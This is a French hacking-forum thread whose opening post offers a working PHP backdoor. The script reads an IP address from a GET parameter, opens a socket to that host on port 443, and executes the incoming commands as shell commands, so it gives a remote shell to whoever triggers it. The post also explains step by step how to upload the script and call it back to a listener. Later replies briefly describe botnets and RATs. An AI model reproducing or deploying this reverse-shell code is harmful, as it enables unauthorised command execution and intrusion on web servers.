• Ce site utilise des cookies. En continuant à utiliser ce site, vous acceptez l'utilisation des cookies. En savoir plus.


PHP Simple Backdoor for Web Server (GET)

Statut
N'est pas ouverte pour d'autres réponses.
Inscrit
23 Septembre 2013
Messages
19
J'aime
13
Points
71
#1
Bonjour, Konnichiwa, Zdra'vstvwite, Slam 3alaykoum, Zdr6avo ...
Des fois j'ai rien à faire et donc je m'amuse à faire des petits script pour le fun.
Donc je vous présente un petit script bête mais plutôt utile ( ? ).



  • PHP:
    <?php
    [*]
    
    [*]    error_reporting(0);
    [*]
    
    [*]    /** Author : G4eL **/
    [*]
    
    [*]    $ccc = $_GET['ip'];
    [*]
    
    [*]    if ($ccc <> ""){ $c=fsockopen($ccc, 443);
    [*]
    
    [*]    while(!feof($c)){
    [*]
    
    [*]            fputs($c);      $gets = fgets($c, 8200);
    [*]
    
    [*]            $s = `$gets`;  fputs($c, $s);
    [*]
    
    [*]            }
    [*]
    
    [*]            fclose($c);
    [*]
    
    [*]    }
    [*]
    
    [*]?>

( Lien d'origine :
Vous devez vous inscrire pour voir les liens !
)

En gros...
Nous créons une connexion en socket sur une adresse IP sous le port "443" (Le port est modifiable hein..) !
Mais sur une adresse IP.. La qu'elle, et pourquoi ?
En faite, notre site est l’équivalent d'un "backdoor" mais en PHP.
Parce que nous créons une connexion persistante sur un serveur.
Mais le serveur c'est qui ? Bah nous.
Comment ? Il nous suffit d'avoir notre port (exemple) 443 en écoute.
De ce fait, le serveur web qui exécute notre script PHP est
considérable comme un client qui ce connecte à nous.


Ok et ? C'est quoi l'utilité ? Et baaaaaaaaaah.. !
Si nous sommes le serveur, et le "webserver" le client qui est connecté à nous ;
Nous pouvons exécuter des commandes celons le système d'exploitation du server web.
(Windows, Solaris, Linux, BSD, ...)


Mais les commandes seront exécuter avec les permissions de l'utilisateur qui exécute votre script PHP (Heuresement).

Bon, je vous donne un exemple :

Pyj20 décide d'utiliser le script.
- Il demande à son ami Pyj30 d'upload le script sur son site.
- Pyj30 upload le script sous le nom de cestkoa.php


Pyj20 peut aller sur le site de Pyj30 et sur son script. Exemple :
Vous devez vous inscrire pour voir les liens !

Pyj20 met en écoute son port 443.
Il exécute le script avec le
GET suivant :
Vous devez vous inscrire pour voir les liens !
?ip=
64.0.0.1 ( 64.0.0.1 = l'IP de Pyj20 )


//Le serveur web "pyj30.com" ce connecte à l'IP de Pyj20 sous le port 443.

Et?
Pyj20 peut donc faire son petit serveur en python, perl, ou autres pour recevoir la connexion du client ("pyj30.com").
Ensuite, sur le script PHP nous avons les fonctions "fputs" et "fgets"
qui nous permettent d'envoyer des commandes, et d'en recevoir le résultat.

Imaginons que le serveur web "pyj30.com" est sous Debian.
Pyj20 peut exécuter sur son serveur des commandes :
pwd, ls, cd, mkdir, unlink, mv, wget, apt-get , etc etc etc..
(Selon les permissions de l'usr qui exécute le PHP sur le Webserver)
 
Dernière édition:
Inscrit
28 Octobre 2013
Messages
4
J'aime
0
Points
21
#2
merci pour le code, mais j'aimerais te poser une question qu'a rien avoir avec ton script !!

tu pourrais m'expliquer le principe d'un botnet??
 
Inscrit
23 Septembre 2013
Messages
19
J'aime
13
Points
71
#3
C'est une application windows (.exe) (ou autres) qui ce connecte à un serveur web.
Sur ton serveur web tu gère tes victimes, en gros un botnet HTTP
Après IRC (Botnet IRC) c'est la même chose sauf que l'application ce connecte à un serveur IRC.
Libre à toi de créer un Botnet qui utilisent un autre moyen de passerelle après..
Si l'application ce connecte à un serveur machine ordinaire (ta machine par exemple), ça s'appelle "RAT"
Mais bon je suis pas vraiment fan/utilisateur/.. de ses trucs désolé, j'sais juste le principe du truc on va dire (qui est simple à comprendre je trouve)
 
Dernière édition:
Inscrit
28 Octobre 2013
Messages
4
J'aime
0
Points
21
#5
desolé pour le derangement encore une fois, mais j'aurais encore une question pour toi
c'est quoi un exactement un scripte kiddie, je sais que c'est un programme dont se servent les pirates mais j'aimerais comprendre comment il fonctionne et comment en programmer ci possible
 
Inscrit
23 Septembre 2013
Messages
19
J'aime
13
Points
71
#6
Pour moi c'est le type de mec qui traine 24h/24h sur des sites du style Exploit-DB, etc..
Dans le seul but de trouver un truc récent et l'utiliser pour avoir une pseudo-notoriété en tant que "haker-lol666"

(Mais je trouve que le mot est un peut vieux)
 
Dernière édition:
Statut
N'est pas ouverte pour d'autres réponses.


Discussions similaires